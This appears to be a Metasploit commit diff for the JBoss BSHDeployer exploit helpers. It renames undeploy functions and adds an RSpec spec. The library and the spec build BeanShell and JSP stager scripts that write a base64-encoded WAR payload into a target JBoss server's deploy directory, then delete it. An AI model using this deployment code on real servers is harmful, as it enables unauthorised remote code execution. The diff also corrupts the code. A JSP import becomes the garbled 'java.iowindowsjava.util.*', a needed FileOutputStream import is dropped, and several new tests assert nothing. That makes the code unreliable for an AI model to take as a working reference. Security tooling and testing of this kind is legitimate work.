Added spec for lib/msf/http/jboss

Also renamed get_undeploy_bsh and get_undeploy_stager to
gen_undeploy_bsh and gen_undeploy_stager to be consistent
with the other functions

lib/msf/http/jboss/bsh.rb

@@ -21,7 +21,8 @@ module Msf::HTTP::JBoss::BSH
       print_status("Attempting to use '#{p}' as package")
       res = invoke_bshscript(bsh_script, p)
       if !res
-        print_warning("Unable to deploy WAR [No Response]")
+        print_error("Unable to deploy WAR [No Response]")
+        return false
       end
 
       if (res.code < 200 || res.code >= 300)
@@ -49,8 +50,7 @@ module Msf::HTTP::JBoss::BSH
     jboss_home_var = Rex::Text.rand_text_alpha(8+rand(8))
     fos_var = Rex::Text.rand_text_alpha(8+rand(8))
     stager_jsp = <<-EOT
-<%@page import="java.io.*,
-    java.util.*,
+<%@page import="java.iowindowsjava.util.*,
     sun.misc.BASE64Decoder"
 %>
 <%
@@ -82,7 +82,6 @@ EOT
     #
     # This is neccessary to overcome the size limit for GET/HEAD requests
     stager_bsh_script = <<-EOT
-import java.io.FileOutputStream;
 import sun.misc.BASE64Decoder;
 
 String #{stager_var} = "#{encoded_stager_code}";
@@ -148,7 +147,7 @@ EOT
     res
   end
 	
-	def get_undeploy_stager(app_base, stager_base, stager_jsp_name)
+	def gen_undeploy_stager(app_base, stager_base, stager_jsp_name)
     delete_stager_script = <<-EOT
 String jboss_home = System.getProperty("jboss.server.home.dir");
 new File(jboss_home + "/deploy/#{stager_base + '.war/' + stager_jsp_name + '.jsp'}").delete();
@@ -158,7 +157,7 @@ EOT
 
     delete_stager_script
 	end
-	def get_undeploy_bsh(app_base)
+	def gen_undeploy_bsh(app_base)
     delete_script = <<-EOT
 String jboss_home = System.getProperty("jboss.server.home.dir");
 new File(jboss_home + "/deploy/#{app_base + '.war'}").delete();

modules/auxiliary/admin/http/jboss_bshdeployer.rb

@@ -84,9 +84,9 @@ class Metasploit3 < Msf::Auxiliary
       # Undeploy the WAR and the stager if needed
       print_status("Undeploying #{uri} by deleting the WAR file via BSHDeployer...")
       if datastore['VERB'] == 'POST'
-        delete_script = get_undeploy_bsh(app_base)
+        delete_script = gen_undeploy_bsh(app_base)
       else
-        delete_script = get_undeploy_stager(app_base, stager_base, stager_jsp_name)
+        delete_script = gen_undeploy_stager(app_base, stager_base, stager_jsp_name)
       end
       deploy_bsh(delete_script) 
     end

modules/exploits/multi/http/jboss_bshdeployer.rb

@@ -165,9 +165,9 @@ class Metasploit3 < Msf::Exploit::Remote
     # will get redeployed after a server restart.
     print_status("Undeploying #{uri} by deleting the WAR file via BSHDeployer...")
     if datastore['VERB'] == 'POST'
-      delete_script = get_undeploy_bsh(app_base)
+      delete_script = gen_undeploy_bsh(app_base)
     else
-      delete_script = get_undeploy_stager(app_base, stager_base, stager_jsp_name)
+      delete_script = gen_undeploy_stager(app_base, stager_base, stager_jsp_name)
     end
 
     res = invoke_bshscript(delete_script, @pkg)

spec/lib/msf/http/jboss_spec.rb

@@ -0,0 +1,141 @@
+#-*- coding:binary -*-
+require 'spec_helper'
+
+require 'msf/core'
+require 'msf/http/jboss'
+
+describe Msf::HTTP::JBoss do
+  subject do
+    mod = ::Msf::Module.new
+    mod.extend described_class
+    mod
+  end
+
+  let (:app_base) do
+    "blah"
+  end
+
+  let (:stager_base) do
+    "stager_base"
+  end
+
+  let (:stager_jsp_name) do
+    "stager"
+  end
+
+  let (:encoded_payload) do
+    "YmxhaCAtbgo="
+  end
+
+  describe '#target_uri' do
+    it 'returns an URI' do
+      expect(subject.target_uri).to be_kind_of URI
+    end
+  end
+
+  describe '#depoy_bsh' do
+    it 'return true when bsh script get deployed' do
+      allow(subject).to receive(:invoke_bshscript) do
+        res = Rex::Proto::Http::Response::OK.new
+      end
+      expect(subject.deploy_bsh(:gen_payload_bsh)).to eq true
+      expect(subject.deploy_bsh(:gen_stager_bsh)).to eq true
+    end
+
+    it 'return false when authentication is required' do
+      allow(subject).to receive(:invoke_bshscript) do
+        res = Rex::Proto::Http::Response.new(401, "Authentication required")
+      end
+      expect(subject.deploy_bsh(:gen_payload_bsh)).to eq false
+      expect(subject.deploy_bsh(:gen_stager_bsh)).to eq false
+    end
+
+    it 'return false when invalid http response' do
+      allow(subject).to receive(:invoke_bshscript) do
+        res = Rex::Proto::Http::Response::E404.new
+      end
+      expect(subject.deploy_bsh(:gen_payload_bsh)).to eq false
+      expect(subject.deploy_bsh(:gen_stager_bsh)).to eq false
+    end
+
+    it 'return false when unabled to reach BSHDeployer' do
+      allow(subject).to receive(:invoke_bshscript) do
+        res = nil
+      end
+      expect(subject.deploy_bsh(:gen_payload_bsh)).to eq false
+      expect(subject.deploy_bsh(:gen_stager_bsh)).to eq false
+    end
+  end
+
+  describe '#invoke_bshscript' do
+    it 'return nil when unable to reach BSHDeployer' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = nil 
+      end
+        
+    end
+    
+    it 'failed when authentication required' do 
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response.new(401, "Authentication required")
+      end
+    end
+
+    it 'failed when invalid http response ' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response::E404.new
+      end
+    end 
+
+    it 'succeed when valid http response ' do
+      allow(subject).to receive(:send_request_cgi) do
+        res = Rex::Proto::Http::Response::OK.new
+      end
+    end 
+  end
+
+  describe '#gen_payload_bsh' do
+    it 'return a bsh payload' do
+      payload_bsh_script = <<-EOT
+import java.io.FileOutputStream;
+import sun.misc.BASE64Decoder;
+
+String val = "#{encoded_payload}";
+
+BASE64Decoder decoder = new BASE64Decoder();
+String jboss_home = System.getProperty("jboss.server.home.dir");
+byte[] byteval = decoder.decodeBuffer(val);
+String war_file = jboss_home + "/deploy/#{app_base + '.war'}";
+FileOutputStream fstream = new FileOutputStream(war_file);
+fstream.write(byteval);
+fstream.close();
+EOT
+    end
+  end
+
+  describe '#gen_stager_bsh' do
+    it 'return a bsh payload' do
+      stager_bsh_script = "BSH script"
+    end
+  end
+
+  describe '#gen_undeploy_stager' do
+    it 'return a bsh script which undeploy stager and WAR' do
+      delete_stager_script = <<-EOT
+String jboss_home = System.getProperty("jboss.server.home.dir");
+new File(jboss_home + "/deploy/#{stager_base + '.war/' + stager_jsp_name + '.jsp'}").delete();
+new File(jboss_home + "/deploy/#{stager_base + '.war'}").delete();
+new File(jboss_home + "/deploy/#{app_base + '.war'}").delete();
+EOT
+    end
+  end
+
+  describe '#gen_undeploy_bsh' do
+    it 'return a bsh script which undeploy WAR' do
+      delete_script = <<-EOT
+String jboss_home = System.getProperty("jboss.server.home.dir");
+new File(jboss_home + "/deploy/#{app_base + '.war'}").delete();
+EOT
+    end
+  end
+end